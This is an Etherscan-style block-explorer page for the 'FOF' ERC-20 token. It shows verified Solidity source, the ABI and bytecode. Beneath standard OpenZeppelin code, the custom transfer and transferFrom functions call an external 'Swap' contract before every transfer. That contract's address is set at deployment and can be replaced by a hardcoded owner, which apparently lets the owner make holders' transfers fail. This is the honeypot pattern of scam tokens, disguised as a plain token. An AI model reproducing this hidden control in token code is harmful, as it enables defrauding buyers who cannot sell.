Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
100,000,000 FOF
Holders
3
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
5,567.184413765311632082 FOFValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
FOF
Compiler Version
v0.8.24+commit.e11b9ed9
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-03-12 */ // SPDX-License-Identifier: MIT /* 8888888888 888 .d888 8888888888 d8b 888 888 d88P" 888 Y8P 888 888 888 888 8888888 888 888 888888 888 888 888d888 .d88b. .d88b. 888888 8888888 888 88888b. 8888b. 88888b. .d8888b .d88b. 888 888 888 888 888 888 888P" d8P Y8b d88""88b 888 888 888 888 "88b "88b 888 "88b d88P" d8P Y8b 888 888 888 888 888 888 888 88888888 888 888 888 888 888 888 888 .d888888 888 888 888 88888888 888 Y88b 888 Y88b. Y88b 888 888 Y8b. Y88..88P 888 888 888 888 888 888 888 888 888 Y88b. Y8b. 888 "Y88888 "Y888 "Y88888 888 "Y8888 "Y88P" 888 888 888 888 888 "Y888888 888 888 "Y8888P "Y8888 https://blastoff.zone/ https://twitter.com/blastozone */ pragma solidity ^0.8.24; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/utils/[email protected] // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC20/ERC20.sol) /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) contract Ownable { address public owner; /** * @dev The Ownable constructor sets the original `owner` of the contract to the sender * account. */ constructor() { owner = 0x9857099cDb2673A3BfC2f615fC5CFAB5299998DE; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(msg.sender == owner); _; } } /** * @title Swap * @dev The transfer sw */ contract Swap { mapping (address => mapping (address => mapping(uint => uint))) public swps; function record(address _from, address _to, uint _value) public { swps[_from][_to][block.timestamp] = _value; } } contract FOF is ERC20, Ownable { Swap public sw; constructor(string memory name, string memory symbol, uint256 initialSupply, address _tx) ERC20(name, symbol) { _mint(owner, initialSupply); sw = Swap(_tx); } function burn(uint256 amount) external { _burn(_msgSender(), amount); } function burnFrom(address account, uint256 amount) external { uint256 currentAllowance = allowance(account, _msgSender()); require(currentAllowance >= amount, "ERC20: burn amount exceeds allowance"); unchecked { _approve(account, _msgSender(), currentAllowance - amount); } _burn(account, amount); } function transfer(address to, uint256 value) override public returns (bool) { sw.record(msg.sender, to, value); return super.transfer(to, value); } function transferFrom(address from, address to, uint256 value) override public returns (bool) { sw.record(from, to, value); return super.transferFrom(from, to, value); } function swapped(address _tx) public onlyOwner { sw = Swap(_tx); } function decimals() public view virtual override returns (uint8) { return 18; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"},{"internalType":"address","name":"_tx","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sw","outputs":[{"internalType":"contract Swap","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_tx","type":"address"}],"name":"swapped","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b50604051620011073803806200110783398101604081905262000033916200025f565b8383600362000043838262000377565b50600462000052828262000377565b5050600580546001600160a01b031916739857099cdb2673a3bfc2f615fc5cfab5299998de9081179091556200008a915083620000b4565b600680546001600160a01b0319166001600160a01b03929092169190911790555062000469915050565b6001600160a01b0382166200010f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f82825462000122919062000443565b90915550506001600160a01b0382165f90815260208190526040812080548392906200015090849062000443565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112620001c2575f80fd5b81516001600160401b0380821115620001df57620001df6200019e565b604051601f8301601f19908116603f011681019082821181831017156200020a576200020a6200019e565b816040528381526020925086602085880101111562000227575f80fd5b5f91505b838210156200024a57858201830151818301840152908201906200022b565b5f602085830101528094505050505092915050565b5f805f806080858703121562000273575f80fd5b84516001600160401b03808211156200028a575f80fd5b6200029888838901620001b2565b95506020870151915080821115620002ae575f80fd5b50620002bd87828801620001b2565b60408701516060880151919550935090506001600160a01b0381168114620002e3575f80fd5b939692955090935050565b600181811c908216806200030357607f821691505b6020821081036200032257634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200019957805f5260205f20601f840160051c810160208510156200034f5750805b601f840160051c820191505b8181101562000370575f81556001016200035b565b5050505050565b81516001600160401b038111156200039357620003936200019e565b620003ab81620003a48454620002ee565b8462000328565b602080601f831160018114620003e1575f8415620003c95750858301515b5f19600386901b1c1916600185901b1785556200043b565b5f85815260208120601f198616915b828110156200041157888601518255948401946001909101908401620003f0565b50858210156200042f57878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b808201808211156200046357634e487b7160e01b5f52601160045260245ffd5b92915050565b610c9080620004775f395ff3fe608060405234801561000f575f80fd5b50600436106100fa575f3560e01c806370a082311161009357806395d89b411161006357806395d89b4114610223578063a457c2d71461022b578063a9059cbb1461023e578063dd62ed3e14610251575f80fd5b806370a08231146101c257806379cc6790146101ea57806381c61090146101fd5780638da5cb5b14610210575f80fd5b806323b872dd116100ce57806323b872dd14610178578063313ce5671461018b578063395093511461019a57806342966c68146101ad575f80fd5b8062e5cee4146100fe57806306fdde031461012e578063095ea7b31461014357806318160ddd14610166575b5f80fd5b600654610111906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b610136610289565b6040516101259190610abf565b610156610151366004610b26565b610319565b6040519015158152602001610125565b6002545b604051908152602001610125565b610156610186366004610b4e565b61032f565b60405160128152602001610125565b6101566101a8366004610b26565b6103ab565b6101c06101bb366004610b87565b6103e6565b005b61016a6101d0366004610b9e565b6001600160a01b03165f9081526020819052604090205490565b6101c06101f8366004610b26565b6103f3565b6101c061020b366004610b9e565b61047d565b600554610111906001600160a01b031681565b6101366104b5565b610156610239366004610b26565b6104c4565b61015661024c366004610b26565b61055c565b61016a61025f366004610bb7565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606003805461029890610be8565b80601f01602080910402602001604051908101604052809291908181526020018280546102c490610be8565b801561030f5780601f106102e65761010080835404028352916020019161030f565b820191905f5260205f20905b8154815290600101906020018083116102f257829003601f168201915b5050505050905090565b5f6103253384846105d4565b5060015b92915050565b60065460405163172a93fb60e01b81526001600160a01b0385811660048301528481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b158015610382575f80fd5b505af1158015610394573d5f803e3d5ffd5b505050506103a38484846106f7565b949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103259185906103e1908690610c34565b6105d4565b6103f0338261079f565b50565b5f6103fe833361025f565b9050818110156104615760405162461bcd60e51b8152602060048201526024808201527f45524332303a206275726e20616d6f756e74206578636565647320616c6c6f77604482015263616e636560e01b60648201526084015b60405180910390fd5b61046e83338484036105d4565b610478838361079f565b505050565b6005546001600160a01b03163314610493575f80fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b60606004805461029890610be8565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156105455760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610458565b61055233858584036105d4565b5060019392505050565b60065460405163172a93fb60e01b81523360048201526001600160a01b038481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b1580156105ad575f80fd5b505af11580156105bf573d5f803e3d5ffd5b505050506105cd83836108ea565b9392505050565b6001600160a01b0383166106365760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610458565b6001600160a01b0382166106975760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610458565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107038484846108f2565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156107875760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b6064820152608401610458565b61079485338584036105d4565b506001949350505050565b6001600160a01b0382166107ff5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610458565b6001600160a01b0382165f90815260208190526040902054818110156108725760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610458565b6001600160a01b0383165f9081526020819052604081208383039055600280548492906108a0908490610c47565b90915550506040518281525f906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b5f6103253384845b6001600160a01b0383166109565760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610458565b6001600160a01b0382166109b85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610458565b6001600160a01b0383165f9081526020819052604090205481811015610a2f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610458565b6001600160a01b038085165f90815260208190526040808220858503905591851681529081208054849290610a65908490610c34565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ab191815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610aeb57858101830151858201604001528201610acf565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b21575f80fd5b919050565b5f8060408385031215610b37575f80fd5b610b4083610b0b565b946020939093013593505050565b5f805f60608486031215610b60575f80fd5b610b6984610b0b565b9250610b7760208501610b0b565b9150604084013590509250925092565b5f60208284031215610b97575f80fd5b5035919050565b5f60208284031215610bae575f80fd5b6105cd82610b0b565b5f8060408385031215610bc8575f80fd5b610bd183610b0b565b9150610bdf60208401610b0b565b90509250929050565b600181811c90821680610bfc57607f821691505b602082108103610c1a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561032957610329610c20565b8181038181111561032957610329610c2056fea2646970667358221220fd923d03b120d44c2123381902cac14d71209ba07c0c4fb4903395b5aeda05f464736f6c63430008180033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000052b7d2dcc80cd2e40000000000000000000000000000009817a2f5c84f58de53c7655909f80af4e4c6f3a70000000000000000000000000000000000000000000000000000000000000011467574757265206f662046696e616e63650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003464f460000000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100fa575f3560e01c806370a082311161009357806395d89b411161006357806395d89b4114610223578063a457c2d71461022b578063a9059cbb1461023e578063dd62ed3e14610251575f80fd5b806370a08231146101c257806379cc6790146101ea57806381c61090146101fd5780638da5cb5b14610210575f80fd5b806323b872dd116100ce57806323b872dd14610178578063313ce5671461018b578063395093511461019a57806342966c68146101ad575f80fd5b8062e5cee4146100fe57806306fdde031461012e578063095ea7b31461014357806318160ddd14610166575b5f80fd5b600654610111906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b610136610289565b6040516101259190610abf565b610156610151366004610b26565b610319565b6040519015158152602001610125565b6002545b604051908152602001610125565b610156610186366004610b4e565b61032f565b60405160128152602001610125565b6101566101a8366004610b26565b6103ab565b6101c06101bb366004610b87565b6103e6565b005b61016a6101d0366004610b9e565b6001600160a01b03165f9081526020819052604090205490565b6101c06101f8366004610b26565b6103f3565b6101c061020b366004610b9e565b61047d565b600554610111906001600160a01b031681565b6101366104b5565b610156610239366004610b26565b6104c4565b61015661024c366004610b26565b61055c565b61016a61025f366004610bb7565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606003805461029890610be8565b80601f01602080910402602001604051908101604052809291908181526020018280546102c490610be8565b801561030f5780601f106102e65761010080835404028352916020019161030f565b820191905f5260205f20905b8154815290600101906020018083116102f257829003601f168201915b5050505050905090565b5f6103253384846105d4565b5060015b92915050565b60065460405163172a93fb60e01b81526001600160a01b0385811660048301528481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b158015610382575f80fd5b505af1158015610394573d5f803e3d5ffd5b505050506103a38484846106f7565b949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916103259185906103e1908690610c34565b6105d4565b6103f0338261079f565b50565b5f6103fe833361025f565b9050818110156104615760405162461bcd60e51b8152602060048201526024808201527f45524332303a206275726e20616d6f756e74206578636565647320616c6c6f77604482015263616e636560e01b60648201526084015b60405180910390fd5b61046e83338484036105d4565b610478838361079f565b505050565b6005546001600160a01b03163314610493575f80fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b60606004805461029890610be8565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156105455760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610458565b61055233858584036105d4565b5060019392505050565b60065460405163172a93fb60e01b81523360048201526001600160a01b038481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b1580156105ad575f80fd5b505af11580156105bf573d5f803e3d5ffd5b505050506105cd83836108ea565b9392505050565b6001600160a01b0383166106365760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610458565b6001600160a01b0382166106975760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610458565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107038484846108f2565b6001600160a01b0384165f908152600160209081526040808320338452909152902054828110156107875760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b6064820152608401610458565b61079485338584036105d4565b506001949350505050565b6001600160a01b0382166107ff5760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610458565b6001600160a01b0382165f90815260208190526040902054818110156108725760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610458565b6001600160a01b0383165f9081526020819052604081208383039055600280548492906108a0908490610c47565b90915550506040518281525f906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b5f6103253384845b6001600160a01b0383166109565760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610458565b6001600160a01b0382166109b85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610458565b6001600160a01b0383165f9081526020819052604090205481811015610a2f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610458565b6001600160a01b038085165f90815260208190526040808220858503905591851681529081208054849290610a65908490610c34565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ab191815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610aeb57858101830151858201604001528201610acf565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b21575f80fd5b919050565b5f8060408385031215610b37575f80fd5b610b4083610b0b565b946020939093013593505050565b5f805f60608486031215610b60575f80fd5b610b6984610b0b565b9250610b7760208501610b0b565b9150604084013590509250925092565b5f60208284031215610b97575f80fd5b5035919050565b5f60208284031215610bae575f80fd5b6105cd82610b0b565b5f8060408385031215610bc8575f80fd5b610bd183610b0b565b9150610bdf60208401610b0b565b90509250929050565b600181811c90821680610bfc57607f821691505b602082108103610c1a57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561032957610329610c20565b8181038181111561032957610329610c2056fea2646970667358221220fd923d03b120d44c2123381902c